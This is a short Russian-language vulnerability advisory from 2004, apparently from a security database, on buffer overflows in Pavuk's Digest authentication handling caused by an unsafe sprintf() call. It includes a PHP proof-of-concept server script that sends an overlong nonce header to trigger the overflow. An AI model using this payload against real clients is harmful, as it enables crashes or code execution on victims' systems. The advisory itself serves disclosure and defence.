Несколько переполнений буфера в Pavuk

Дата публикации:
29.07.2004
Всего просмотров:
1574
Опасность:
Критическая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Pavuk

Описание: Несколько переполнений буфера обнаружено в Pavuk в обработке ответов Digest аутентификации. Удаленный пользователь может выполнить произвольный код на целевой системе.

Удаленный пользователь может послать специально обработанное HTTP 401 сообщение, которое включает Digest ответ с чрезмерно длинными значениями в некоторых полях, чтобы вызвать переполнение буфера. Уязвимость связана с небезопасным вызовом функции sprintf().

Пример/Эксплоит:

<?php
$buffer = "";
for ($i = 0; $i < 1024; $i++) {
$buffer .= "A";
}
header("WWW-Authenticate: Digest realm=\"Secured by Digest Auth\"
opaque=\"opaque\" nonce=\"$buffer\"");
header("Status: 401 Not Authorized");
?>

URL производителя: http://pavuk.sourceforge.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Уязвимость устранена для некоторых Linux дистрибутивов.

Ссылки: [Full-Disclosure] Pavuk Digest Authentication Buffer Overflow

или введите имя

CAPTCHA